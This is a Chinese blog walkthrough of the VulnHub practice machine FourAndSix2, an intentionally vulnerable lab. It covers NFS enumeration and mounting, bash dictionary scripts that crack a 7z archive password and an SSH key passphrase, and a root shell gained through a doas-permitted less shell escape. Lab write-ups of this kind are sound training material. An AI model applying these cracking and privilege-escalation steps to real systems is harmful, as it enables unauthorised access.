Vulnhub:fourandsix2渗透测试

最新推荐文章于 2024-04-18 20:44:41 发布
最新推荐文章于 2024-04-18 20:44:41 发布
阅读量409 收藏 1
点赞数
文章标签: 渗透测试 VulnHub fourandsix2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AtalantaDavis/article/details/88410468
版权

测试环境

攻击IP靶机IP
192.168.179.133172.17.135.62

测试过程

老规矩,对靶机nmap一波。

nmap扫描过程截图

检测靶机运行的服务:

22端口: ssh服务
111端口: rpcbind服务
2049端口: nfs服务

简述一下nfs服务。

主要功能是通过网络让不同的机器系统之间可以彼此共享文件和目录。NFS服务器可以允许NFS客户端将远端NFS服务器端的共享目录挂载到本地的NFS客户端中。

用metasploit挂载目录。我的kali里面没有这个软件。顺便在这里介绍一下,metasploit的安装。参考链接:kali2.0 metasploit安装

  1. 安装代码:apt-get install metasploit-framework
  2. 安装完成后,启动postgresql数据库:/etc/init.d/postgresql start;或者 service
  3. postgresql start 设置开机自启:update-rc.d postgresql enable
  4. 初始化MSF数据库(关键步骤!):msfdb init 运行:msfconsole

这里nfs在metasploit的运行后命令是:use auxiliary/scanner/nfs/nfsmountmetasploit运行命令截图
发现挂载目录是/home/user/storage
用户名是user

用nfspysh(nfspysh是一个类FTP的交互式Shell,可以用来查询NFS export。它不需要使用FUSE库,因此它可以在非Linux平台上运行。)来挂载目录/home/user/storage

挂载目录截图

发现挂载目录下有一个backup.7z。在本地文件下解压。会发现需要密码来解压。
7z尝试解压截图

可以用rarcrack(安装它需要用libxml2)用枚举的方式来爆破。但是过程太久。

查资料找到一个用7z命令来爆破

创建文件7z-crack.sh

cat $2 |   #捕捉命令输入的第二个地址的文件
    while read line;  #读第二个文件(爆破文件)的每一行
        do 
            if 7z e $1 -p"$line" 1>/dev/null 2>/dev/null;  #如果 7z e $1(需要爆破的文件)解压密码是对的
                then echo "FOUND PASSWORD:"$line;  #输出正确密码,并解压。
                break;
            fi;
        done

上面的 1>/dev/null 2>/dev/null,是为了把解压密码错误时,多余的文字都输入到/dev/null,而不是输出到终端上显示。

运行命令:bash 7z-crack.sh backup.7z /usr/share/wordlists/rockyou.txt

文件爆破出后,密码是:chocolate

压缩包密码截图

解压出来后有公私钥,以及八张hellokitty。将私钥放进/root/.ssh,ssh-keygen登入172.17.135.62。需要爆破私钥密码。和上面一样写脚本爆破。
ssh-crach.sh

cat $2 | 

while read line;
	do 
		if ssh-keygen -p -P $line -N $line -f $1 1>/dev/null 2>/dev/null;
			then echo "PASSWORD FOUND : "$line;
		break;
	fi;
	done;

if判断那一步是假装ssh-keygen输入密码来判断是否正确,并输出。

运行命令是:bash ssh-crach.sh id_rsa /usr/share/wordlists/rockyou.txt

爆破密码是12345678

ssh私钥密码爆破截图

ssh user@172.17.135.62
ssh登陆成功截图

查看用户权限及系统信息
查看用户权限及系统信息截图

查看/etc/doas.conf.(openBSD的doas和Ubuntu的sudo是差不多的。)
doas.conf文件查看截图
发现允许user用户可以以root权限来运行/usr/bin/less 打开 /var/log/authlog,打开后按v。再按esc。输入:!./bin/sh。回车。获取到root权限。到/root下找到flag.txt。
渗透成功截图

总结

有些渗透技巧不看wp真的想不到,还是需要经常打。下面附上大佬的WP。

参考WP链接

MoR03r博客文章:VulnHub渗透测试FourAndSix2

AtalantaDavis
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2065
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
Vulnhub靶机-Prime1
m0_74855736的博客
03-08 1007
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
Vulnhub靶机——DC-1
最新发布
流水不争先,争的是滔滔不绝
04-18 842
Vulnhub靶机——DC-1,cms(Drupal 7)存在框架漏洞,msf利用框架漏洞拿到普通用户的shell,再通过SUID提权
Vulnhub】搭建Vulnhub靶机
zg_111的博客
03-28 8950
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
[vulnhub系列]Chili-靶机
薛定谔嘚喵博客
03-07 1953
在该靶机渗透流程中,前端的信息收集尤为重要,爆破web网页中,查看源代码是很有益处的,可以看到一些敏感信息。以及一些爆破工具的使用,hydra工具是此次渗透的关键,爆破出了ftp账号密码;然后使用ftp端口服务进行ftp权限登陆,查看可执行文件类型,而后生成shell脚本,访问网页,进行反弹shell,得到shell;
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Mercury
Aluxian_的博客
07-09 882
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机难度中等吧1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.sqlmap基本使用这里就不讲了DC3有写或者别的文章也有讲,ssh-keygen得登入!3.漏洞得利用(漏洞很强大!4.(环境变量)提权得学习!
打靶练习vulnhub: stapler
03-28
打靶练习vulnhub: stapler
打靶练习vulnhub: haclabs
03-20
打靶练习vulnhub: haclabs
打靶练习vulnhub: my-cmsms
04-10
打靶练习vulnhub: my-cmsms
Vulnhub系列靶机-THM-ContainMe-v4
来日可期的博客
09-16 1197
详细解析:通过执行此命令,wfuzz将发送HTTP请求到目标URL,并使用字典文件中的词进行模糊测试。wfuzz是一款用于Web应用程序模糊测试的开源工具,它可以帮助用户识别Web应用中存在的漏洞和安全问题。之前在查看etc下的passwd文件的时候有一个mike用户,到该用户的目录下面查看是否有有用的信息。但是之前在mike用户的目录下还发现了.ssh 的文件,查看里面有什么。发现我们拼接的参数执行了,试着查看etc下的passwd文件。:这里将文件下载到tmp目录下,因为其他的目录没有写入的权限。
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 1
Aluxian_的博客
03-22 2857
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机的类型也是第一次做,比较简单。2.smb共享 smbmap枚举(工具得使用)ssh私钥登入3.脏牛提权提权希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
FourAndSix: 2.01靶机入侵
渗透测试研究中心
02-12 175
0x01前言 FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址: https://download.vulnhub.com/fourandsix/FourAndSix2.ova 0x02信息收集 1.存活主机扫描 arp-scan -l 发现192.168.1....
vulnhub_内网渗透测试的记录——网络安全
yz_weixiao的博客
01-03 504
这个靶机花了我大半天的时间,主要还是在网络配置上面的捯饬,内网的靶机每一个都不太难,重要的就是如何通过流量转发后正确的使用一些工具达到扫描端口爆破服务的目的,总体的收获还是挺大的,虽然和真实环境相比确实差别较大,但刚好最近就在用ES这方面的产品,也趁着这个机会对于ES的相关漏洞也加强了学习。
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7727
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
Vulnhub靶机Wakanda渗透测试攻略
大方子
11-18 4624
百度网盘下载地址: 链接:https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密码:aixl 难度级别:中级。 用virtualbox导入Wakanda_1.ova靶机环境,修改其网络连接方式为Bridged(桥接网卡),并选择一个可用于联网的网卡(例如,我使用的无线网卡上网,在图中网卡为Inter(R) Dual Band Wireless-...
Vulnhub靶机 FourAndSix2
菜浪马废的博客
09-16 164
目标靶机ip:192.168.80.139 开放nfs 有一个压缩文件 里面有id-rsa 但是加密了 得到密码:chocolate 用户名:user 还有一层验证 cat /usr/share/wordlists/rockyou.txt | while read pass; do if ssh-keygen -c -C “user@forandsix” -P $pass -f id_rsa &>/dev/null; then echo $pass; break; fi; d.
渗透测试Vulnhub-DC1
TenG的博客
04-17 246
前言 各位师傅们好,在正式写文章前罗嗦几句,很早以前就想搭一个内网渗透的靶场来练习了,不过因为一些原因一直在往后推迟(主要是因为太懒)。这段时间发生了一些事情让我坚定了搞搞内网渗透的信念,目前来说事请还是挺不好的,跟一位最近朋友说过以后他跟我讲以后更大的坎还多着呢,他也跟我说了下自己的心酸往事,听过以后自己也有了些许感触,而这件事请对于我来说到底是好是坏待以后时间证明(至少目前是感觉挺失落的)。还有就是有一个姐姐真好,也正是她一直以来的安慰才能让我调整这么快,不管是这次还是从前或以后兜希望老姐一直能陪着我。
OSCP Like Vulns Machines.pdf
10-06
这份文档汇集了各类VulnHub平台上的实战型虚拟机(VM)环境,这些虚拟机被精心设计,旨在供网络安全专业人员进行专业准备,提升渗透测试技能。Vulnhub是一个著名的漏洞实验室,提供了一系列挑战性的安全漏洞场景,供...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

AtalantaDavis

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值